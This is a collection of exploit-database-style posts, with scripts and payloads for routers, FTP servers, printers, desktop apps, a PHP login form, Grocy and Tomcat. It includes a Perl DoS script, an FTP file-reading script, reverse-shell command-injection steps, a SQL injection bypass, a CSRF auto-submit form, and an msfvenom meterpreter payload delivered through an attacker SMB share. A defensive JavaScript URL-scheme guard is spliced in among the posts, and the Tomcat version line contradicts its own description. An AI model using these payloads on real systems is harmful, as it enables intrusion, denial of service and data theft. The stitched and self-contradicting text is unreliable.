<pre><code># Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities<br /># Date: 25/9/2023<br /># Exploit Author: Shujaat Amin (ZEROXINN)<br /># Vendor Homepage: http://www.tp-link.com<br /># Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br /># Tested on: Windows 10<br /><br />---------------------------POC-----------------------------<br /><br />1) Go to your router's IP (192.168.0.1)<br /><br />2) Go to Access Control --> Target, rule<br /><br />3) Click on "Add New"<br /><br />4) Type <h1>Hello<h1> in the Target Description box<br /><br />5) Click on Save; the injected HTML is now rendered on the webpage<br /><br /></code></pre>
<pre><code># Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities<br /># Date: 25/9/2023<br /># Exploit Author: Syed Affan Ahmed (ZEROXINN)<br /># Vendor Homepage: https://www.embedthis.com/goahead/<br /># Affected Version: 2.5, possibly others.<br /># Tested On Version: 2.5 in ZTE AC3630<br /><br />---------------------------POC---------------------------<br /><br />GoAhead Web Server version 2.5 is prone to multiple HTML injection vulnerabilities due to inadequate input validation.<br /><br />HTML injection lets attacker-supplied markup be rendered in the context of the affected site.<br /><br />http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1><br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /># ComSndFTP Server Remote Format String Denial of Service (DoS)<br /><br />use strict;<br />use warnings;<br />use IO::Socket;<br /><br />$| = 1;<br /><br />my $host = "192.168.172.136";<br />my $port = "21";<br /><br />my $payload = '%s%p%x%d';<br /><br />print "Connecting... ";<br /><br /># IO::Socket::INET->new returns undef and sets $@ on failure, so only die then<br />my $sock = IO::Socket::INET->new(<br />    PeerAddr => $host,<br />    PeerPort => $port,<br />    Proto    => 'tcp',<br />    Timeout  => 30<br />) or die "Unable to connect: $@\n";<br /><br /># read the FTP banner before sending anything<br />$sock->recv(my $content, 100, 0);<br />sleep(2);<br /><br />$sock->send("USER $payload\r\n", 0);<br />sleep(2);<br /><br />$sock->recv($content, 100, 0);<br />sleep(5);<br /><br />$sock->close;<br /><br />print "Denial Of Service completed!\n";<br />exit(0);<br /></code></pre>
<pre><code>#Exploit Title: Ricoh Printer Directory and File Exposure<br />#Date: 9/15/2023<br />#Exploit Author: Thomas Heverin (Heverin Hacker)<br />#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers<br />#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py<br />#Version: Ricoh Printers - All Versions<br />#Tested on: Windows<br />#CVE: N/A<br /><br />#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)<br /><br />from ftplib import FTP<br /><br />def ftp_connect(ip):<br />    try:<br />        ftp = FTP(ip)<br />        ftp.login("guest", "guest")<br />        print(f"Connected to {ip} over FTP as 'guest'")<br />        return ftp<br />    except Exception as e:<br />        print(f"Failed to connect to {ip} over FTP: {e}")<br />        return None<br /><br />if __name__ == "__main__":<br />    target_ip = input("Enter the Ricoh Printer IP address: ")<br /><br />    ftp_connection = ftp_connect(target_ip)<br />    if ftp_connection:<br />        try:<br />            while True:<br />                file_list = ftp_connection.nlst()<br />                print("List of Ricoh printer files and directories:")<br />                for index, item in enumerate(file_list, start=1):<br />                    print(f"{index}. {item}")<br /><br />                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1<br />                if file_index < 0:<br />                    break<br /><br />                if 0 <= file_index < len(file_list):<br />                    selected_file = file_list[file_index]<br />                    lines = []<br />                    ftp_connection.retrlines("RETR " + selected_file, lines.append)<br />                    print(f"Contents of '{selected_file}':")<br />                    for line in lines:<br />                        print(line)<br />                else:<br />                    print("Invalid file index.")<br />        except Exception as e:<br />            print(f"Failed to perform operation: {e}")<br />        finally:<br />            ftp_connection.quit()<br /><br /></code></pre>
<pre><code># Exploit Title: Typora v1.7.4 - OS Command Injection<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 13.09.2023<br /># Vendor Homepage: http://www.typora.io<br /># Software Link: https://download.typora.io/windows/typora-setup-ia32.exe<br /># Tested Version: v1.7.4 (latest)<br /># Tested on: Windows 2019 Server 64bit<br /><br /># # # Steps to Reproduce # # #<br /><br /># Open the application<br /># Click on Preferences from the File menu<br /># Select PDF from the Export tab<br /># Check the "run command" box at the bottom right and enter your reverse shell command into the opened box<br /># Close the page and go back to the File menu<br /># Then select PDF from the Export tab and click Save<br /># Reverse shell is ready!<br /><br /></code></pre>
<pre><code># Exploit Title: Bank Locker Management System - SQL Injection<br /># Application: Bank Locker Management System<br /># Date: 12.09.2023<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://phpgurukul.com/<br /># Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/<br /># Tested on: Windows 10 64 bit Wampserver <br /><br />## Description:<br />This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.<br /><br />## Vulnerability Details:<br />- **Application Name**: Bank Locker Management System<br />- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)<br />- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)<br /><br />## Vulnerability Description:<br />The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:<br /><br />Payload: admin' or '1'='1-- -<br /><br />An attacker can gain unauthorized access to the application with administrative privileges.<br /><br />## Proof of Concept (PoC):<br />1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).<br />2. Navigate to the "banker" directory: http://blms.local/banker/<br />3. In the login and password fields, input the following payload:<br />4. admin' or '1'='1-- -<br /><br /></code></pre>
<pre><code># Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability<br /># Application: Grocy<br /># Version: <= 4.0.2<br /># Date: 09/21/2023<br /># Exploit Author: Chance Proctor<br /># Vendor Homepage: https://grocy.info/<br /># Software Link: https://github.com/grocy/grocy<br /># Tested on: Linux<br /># CVE : CVE-2023-42270<br /><br /><br />Overview<br />==================================================<br />When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.<br />This makes it easy to adjust your request since it is a known format.<br />There is also no CSRF token or other method of verification in place to check where the request is coming from.<br />This allows HTML code to create a new user as long as the target is logged in and has Create User permissions.<br /><br /><br />Proof of Concept<br />==================================================<br />Host the following HTML code via an XSS, or deliver it via a phishing campaign:<br /><br /> <html><br /> <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded"><br /> <input name='username' value='hacker' type='hidden'><br /> <input name='password' value='test' type='hidden'><br /> <input type=submit><br /> </form><br /> <script><br /> history.pushState('','', '/');<br /> document.forms[0].submit();<br /> </script><br /> </html><br /><br /><br />If a user is logged into the Grocy web app at the time of execution, a new user will be created in the app with the following credentials:<br /><br /> Username: hacker<br /> Password: test<br /><br />Note:<br />In order for this to work, the target must have Create User permissions.<br />This is enabled by default.<br /><br /><br />Proof of Exploit/Reproduce<br />==================================================<br />http://xploit.sh/posts/cve-2023-42270/<br /><br /></code></pre>
<pre><code># Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution<br /># Date: 9/27/2023<br /># Exploit Author: ItsSixtyN3in<br /># Vendor Homepage: https://webcatalog.io/en/<br /># Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe<br /># Version: 48.4.0<br /># Tested on: Windows<br /># CVE : CVE-2023-42222<br /><br />Vulnerability summary:<br />WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victim's machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.<br /><br />Exploit details:<br /><br />- Create a reverse shell file.<br /><br />msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe<br /><br /><br />- Host the reverse shell file (or another payload) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)<br /><br />python3 smbserver.py Tools -smb2support<br /><br /><br />- Have the user sync a page with the payload as a renamed link<br /><br />[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)<br /><br /><br />Payload:<br />search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title<br /><br />Tobias Diehl<br />Security Consultant<br />OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300<br />Pronouns: he/him<br />e-mail: tobias.diehl@bulletproofsi.com<br /><br /></code></pre>
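As an added defensive example (not WebCatalog's code), this wrapper applies the missing check described in the summary above: it parses the URL and hands only http(s) URLs to Electron's `shell.openExternal`, so a `search-ms:` or `file:` link from a synced page is refused. The opener is passed in as a parameter (an assumption made so the check runs under plain Node), and the synced link list is constructed sample data.

```javascript
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// True only for absolute URLs whose scheme is http or https.
function isSafeExternalUrl(raw) {
  let url;
  try {
    url = new URL(String(raw)); // WHATWG parser: absolute URLs only, scheme lower-cased
  } catch {
    return false;               // relative or unparsable input never reaches the shell
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// openExternal: in Electron this would be require('electron').shell.openExternal;
// it is injected here (assumed interface) so the guard can be exercised without Electron.
// Returns what happened so the caller can log or surface a refusal to the user.
function openExternalSafely(raw, openExternal) {
  const url = String(raw);
  if (!isSafeExternalUrl(url)) {
    return { opened: false, url, reason: 'scheme not http(s)' };
  }
  openExternal(url);
  return { opened: true, url, reason: null };
}

// Applied to a whole synced page: keep only links the shell may ever open.
function safeLinks(links) {
  return links.filter(isSafeExternalUrl);
}

// Constructed sample: links as they might arrive from a synced page, including a
// search-ms: link shaped like the payload above but with placeholder values.
const syncedLinks = [
  'https://webcatalog.io/en/',
  'search-ms://query=report.docx&displayname=Spoofed%20Windows%20Title',
  'file:///C:/Windows/System32/',
  'javascript:alert(1)',
];
```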
<pre><code># Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 12.09.2023<br /># Vendor Homepage: http://www.7stickynotes.com<br /># Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe<br /># Tested Version: 1.9 (latest)<br /># Tested on: Windows 2019 Server 64bit<br /><br /># # # Steps to Reproduce # # #<br /><br /># Open the program.<br /># Click on "New Note".<br /># Navigate to the "Alarms" tab.<br /># Click on either of the two buttons.<br /># From the "For" field, select "1" and "seconds" (to obtain the shell within 1 second).<br /># From the "Action" dropdown, select "command".<br /># In the activated box, enter the reverse shell command and click the "Set" button to set the alarm.<br /># Finally, click on the checkmark to save the alarm.<br /># Reverse shell obtained!<br /><br /></code></pre>
<pre><code># Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling<br /># Date: 1/31/2024<br /># Exploit Author: xer0dayz<br /># Vendor Homepage: https://tomcat.apache.org/<br /># Software Link: https://tomcat.apache.org/<br /># Version: 8.5.7 to 8.5.63 or 9.0.44 or later<br /># CVE : CVE-2024-21733<br /><br />## Description:<br />Apache Tomcat from 8.5.7 through 8.5.63 and from 9.0.0-M11 through 9.0.43 is vulnerable to client-side de-sync attacks.<br /><br />Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.<br /><br />## Remediation:<br />Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.<br /><br />## Credit:<br />This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.<br /><br />## History:<br />2024-01-19 Original advisory<br /><br />## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz<br /><br />## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/<br /><br />## PoC/Exploit:<br /><br />POST / HTTP/1.1<br />Host: hostname<br />Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br />Connection: keep-alive<br />Content-Length: 6<br />Content-Type: application/x-www-form-urlencoded<br />X<br /></code></pre>